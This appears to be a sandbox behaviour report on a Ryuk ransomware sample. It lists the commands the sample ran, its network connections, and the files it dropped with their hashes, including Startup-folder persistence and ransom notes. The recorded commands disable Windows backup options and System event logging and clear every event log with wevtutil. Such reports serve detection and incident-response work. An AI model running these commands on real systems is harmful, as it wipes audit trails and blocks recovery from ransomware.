C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AMSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "AirSpaceChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "FirstUXPerf-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "General Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "IHM_DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceMFT"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationFrameServer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProc"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MedaFoundationVideoProcD3D"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationAsyncWrapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationContentProtection"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDS"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMP4"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationMediaEngine"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformanceCore"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationSrcPrefetch"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.97.242.52.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
FI 65.108.73.119:445 tcp
N/A 10.127.0.1:139 tcp
FI 65.108.73.119:139 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 210.81.184.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
FR 51.11.192.49:443 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
US 117.18.232.240:80 tcp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 97.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp

Files

C:\ProgramData\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 6a5bf25ff4f72ebca91280ffda057260
SHA1 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

C:\ProgramData\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\ProgramData\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\ProgramData\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\ProgramData\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 85462c5c76a1f9effd9d24af445182da
SHA1 8b5f57029bd8ac3c5b182608de6691d6e1492b3f
SHA256 8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
SHA512 828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5

C:\ProgramData\RYUKID

MD5 85462c5c76a1f9effd9d24af445182da
SHA1 8b5f57029bd8ac3c5b182608de6691d6e1492b3f
SHA256 8ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
SHA512 828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5

C:\ProgramData\hrmlog2

MD5 e14553b25f8951635bc37c90beffecc0
SHA1 60d9f6ff88506a9fcd36342fa2698025e990a673
SHA256 8227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA512 5a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3

C:\ProgramData\hrmlog1

MD5 cf30a97d06523d5819b46c7db7b85129
SHA1 e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256 b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA512 2fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4